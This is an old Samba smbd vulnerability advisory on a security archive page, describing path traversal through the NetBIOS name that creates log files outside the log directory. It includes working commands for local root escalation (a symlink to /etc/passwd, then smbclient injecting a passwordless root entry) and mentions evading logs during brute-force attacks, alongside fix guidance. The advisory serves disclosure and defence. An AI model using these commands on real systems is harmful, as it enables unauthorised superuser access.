what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

adv_smbd_log.txt

adv_smbd_log.txt
Posted Aug 5, 2001
Authored by Michal Zalewski | Site razor.bindview.com

Bindview Advisory - SMBD remote file creation vulnerability. Insufficient parameter validation and unsafe default configuration on popular Linux platforms make systems running samba SMB file sharing daemon vulnerable to remote attacks. Tested on SMBD 2.0.7 and 2.0.8. Samba daemon allows remote attackers to create SMB session log files (*.log) with highly attacker-dependent contents outside outside logs directory. This vulnerability itself can be used to perform DoS attacks, or, if combined with unprivileged local access, can be used to gain superuser privileges.

tags | remote, local
systems | linux
SHA-256 | cd04a10ae9f3510f12059b264b6521eb10a3a3ea5a56ac1c4ae8a772b263273c

adv_smbd_log.txt

Change Mirror Download
smbd remote file creation vulnerability

Issue Date: June 25, 2001
Contact: Michal Zalewski

Topic:

Insufficient parameter validation and unsafe default configuration on
popular Linux platforms make systems running samba SMB file sharing
daemon vulnerable to remote attacks.

Affected Systems:

Tested on smbd 2.0.7 shipped with RedHat Linux 7.0 and 7.1. Confirmed on
2.0.8.

Overview:

Due to insufficient checking of the NetBIOS computer name in incoming
SMB requests, in conjunction with default configuration found on Linux
platforms (like RedHat and derivates), samba daemon allows remote
attackers to create SMB session log files (*.log) with highly
attacker-dependent contents outside outside logs directory. This
vulnerability itself can be used to perform DoS attacks, or, if combined
with unprivileged local access, can be used to gain superuser
privileges.

On vulnerable platforms, by default, each SMB session is logged to the
file /var/log/samba/.log. If the attacker is connecting from 'FOOBAR',
logs would be put in /var/log/foobar.log. Unfortunately, NetBIOS name
'../../../evil' would be accepted as well, creating /evil.log file.

This vulnerability is exploitable if the following setting is present in
smb.conf file:
log file = /var/log/samba/%m.log

...which is default on major Linux distributions, and probably few other
platforms, as well. On some systems, configuration might be different:
log file = /usr/local/samba/var/log.%m

In the second case (e.g. FreeBSD), there is usually no way to exploit
this vulnerability.

Additionally, as noticed by Mark Loveless, using bogus NetBIOS names,
like 'non/existing/dir', it is possible to avoid logging of error
messages (e.g. authentication failures) at all, which might be very
useful for performing brute-force attacks.

Exploit:

This is the scenario of local privilege escalation attack against RedHat
7.x installation:
$ ln -s /etc/passwd /tmp/x.log

$ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../tmp/x -N

...where 'NIMUE' stands for local host name (few error messages should
be returned).
$ su toor
#

Explaination of this attack is pretty trivial. Samba daemon tries to
access logfile for host introducing itself as '../../../tmp/x'. This
translates to open() on /var/log/samba/../../../tmp/x.log. Thus,
/tmp/x.log is opened in O_APPEND mode, following previously created
symlink to /etc/passwd.

Then, anonymous attempt to mount non-existing share named
"\ntoor::0:0::/:/bin/sh\n" is logged in /tmp/x.log, or, if you prefer,
in /etc/passwd.

Error message looks this way:
[2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925)
Rejecting user 'lcamtuf': authentication failed
[2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214)
../../../tmp/x (192.233.133.108) couldn't find service
toor::0:0::/:/bin/sh

The last line is, obviously, accepted by /bin/su or /bin/login.

Fix information:

As a temporary workaround, we suggest changing 'log file' setting, as
described above. This vulnerability has been confirmed by the vendor,
and is addressed there:

https://us1.samba.org/samba/whatsnew/macroexploit.html

Removing '%m' at all would protect against attackers trying to avoid
logging at all. Vendor was informed, fix will be publicly available
soon.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close